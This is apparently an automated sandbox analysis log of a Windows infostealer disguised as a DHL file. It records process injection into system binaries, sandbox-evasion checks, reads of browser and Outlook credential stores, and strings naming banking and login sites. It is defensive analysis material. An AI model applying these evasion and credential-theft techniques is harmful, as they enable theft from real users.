            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000BA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_000BA67C
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000A648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_000A648E
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000342A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_000342A2
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeFile created: C:\Users\user\AppData\Local\Temp\tottenJump to behavior
            Source: rDHL8350232025-2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: netbtugc.exe, 00000004.00000002.4461436648.000000000071B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4461436648.0000000000712000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4461436648.000000000073E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2335239181.0000000000712000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: netbtugc.exe, 00000004.00000002.4461436648.00000000006F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOIN0#oENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: rDHL8350232025-2.exeReversingLabs: Detection: 52%
            Source: unknownProcess created: C:\Users\user\Desktop\rDHL8350232025-2.exe "C:\Users\user\Desktop\rDHL8350232025-2.exe"
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rDHL8350232025-2.exe"
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rDHL8350232025-2.exe"Jump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: rDHL8350232025-2.exeStatic file information: File size 1563136 > 1048576
            Source: rDHL8350232025-2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: rDHL8350232025-2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: rDHL8350232025-2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: rDHL8350232025-2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: rDHL8350232025-2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: rDHL8350232025-2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: rDHL8350232025-2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qSVRmrwLYsrJTsNjTGrEW.exe, 00000003.00000000.2074676354.000000000014E000.00000002.00000001.01000000.00000004.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000000.2220851276.000000000014E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: rDHL8350232025-2.exe, 00000000.00000003.2010892583.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, rDHL8350232025-2.exe, 00000000.00000003.2011959448.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2149235070.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2061355887.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2149235070.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2059839826.0000000003200000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2151251292.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4462648577.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2149261496.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4462648577.0000000002F4E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: rDHL8350232025-2.exe, 00000000.00000003.2010892583.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, rDHL8350232025-2.exe, 00000000.00000003.2011959448.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2149235070.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2061355887.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2149235070.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2059839826.0000000003200000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000003.2151251292.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4462648577.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2149261496.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4462648577.0000000002F4E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.2117854997.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2149131877.0000000003000000.00000004.00000020.00020000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000003.00000003.2087754311.000000000115B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4461436648.000000000068E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4463074784.00000000033DC000.00000004.10000000.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000002.4462504039.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2441817012.000000003985C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4461436648.000000000068E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4463074784.00000000033DC000.00000004.10000000.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000002.4462504039.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2441817012.000000003985C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.2117854997.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2149131877.0000000003000000.00000004.00000020.00020000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000003.00000003.2087754311.000000000115B000.00000004.00000001.00020000.00000000.sdmp
            Source: rDHL8350232025-2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: rDHL8350232025-2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: rDHL8350232025-2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: rDHL8350232025-2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: rDHL8350232025-2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000342DE
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_00050A76 push ecx; ret 0_2_00050A89
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004048A9 push esp; ret 2_2_004048AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E2BA push 00000038h; iretd 2_2_0041E2BE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A436 push ebx; iretd 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418C92 pushad ; retf 2_2_00418C93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A5D9 push ebx; iretd 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004017E5 push ebp; retf 003Fh2_2_004017E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403780 push eax; ret 2_2_00403782
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004147A2 push es; iretd 2_2_004147AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360225F pushad ; ret 2_2_036027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036027FA pushad ; ret 2_2_036027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036309AD push ecx; mov dword ptr [esp], ecx2_2_036309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360283D push eax; iretd 2_2_03602858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360135F push eax; iretd 2_2_03601369
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeCode function: 3_2_03A94BAA push FFFFFFBAh; ret 3_2_03A94BAC
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeCode function: 3_2_03A8BB0B push ebx; iretd 3_2_03A8BB32
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeCode function: 3_2_03A89B5E push ebx; ret 3_2_03A89B5F
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeCode function: 3_2_03A8A1C4 pushad ; retf 3_2_03A8A1C5
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeCode function: 3_2_03A8B968 push ebx; iretd 3_2_03A8BB32
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeCode function: 3_2_03A8F7EC push 00000038h; iretd 3_2_03A8F7F0
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeCode function: 3_2_03A75DDB push esp; ret 3_2_03A75DDC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DE09AD push ecx; mov dword ptr [esp], ecx4_2_02DE09B6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00462238 pushad ; iretd 4_2_00462239
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0046AB37 push 00000038h; iretd 4_2_0046AB3B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00466CB3 push ebx; iretd 4_2_00466E7D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00466E56 push ebx; iretd 4_2_00466E7D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00460EAB push ebp; retf 4_2_00460EAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0046101F push es; iretd 4_2_00461027
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00451126 push esp; ret 4_2_00451127
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0046D1B0 push es; ret 4_2_0046D1D0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0046550F pushad ; retf 4_2_00465510
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_0004F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0004F98E
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000C1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_000C1C41
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Found API chain indicative of sandbox detection
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-98223
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeAPI/Special instruction interceptor: Address: 117BB74
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E rdtsc 2_2_0367096E
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 9842Jump to behavior
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeAPI coverage: 3.5 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 5668Thread sleep count: 130 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 5668Thread sleep time: -260000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 5668Thread sleep count: 9842 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 5668Thread sleep time: -19684000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe TID: 6596Thread sleep time: -85000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe TID: 6596Thread sleep count: 41 > 30Jump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe TID: 6596Thread sleep time: -41000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_0006C2A2 FindFirstFileExW,0_2_0006C2A2
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000A68EE FindFirstFileW,FindClose,0_2_000A68EE
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_000A698F
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_0009D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0009D076
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_0009D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0009D3A9
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_000A9642
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_000A979D
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_000A9B2B
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_0009DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0009DBBE
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000A5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_000A5C97
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0046BAB0 FindFirstFileW,FindNextFileW,FindClose,4_2_0046BAB0
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000342DE
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: F56GKLK7U4.4.drBinary or memory string: discord.comVMware20,11696428655f
            Source: F56GKLK7U4.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: global block list test formVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: F56GKLK7U4.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: netbtugc.exe, 00000004.00000002.4461436648.000000000068E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllj
            Source: F56GKLK7U4.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: F56GKLK7U4.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: F56GKLK7U4.4.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000002.4461843964.0000000000DCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
            Source: F56GKLK7U4.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: firefox.exe, 00000007.00000002.2443598099.000001CB398BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: F56GKLK7U4.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: F56GKLK7U4.4.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: tasks.office.comVMware20,11696428655o
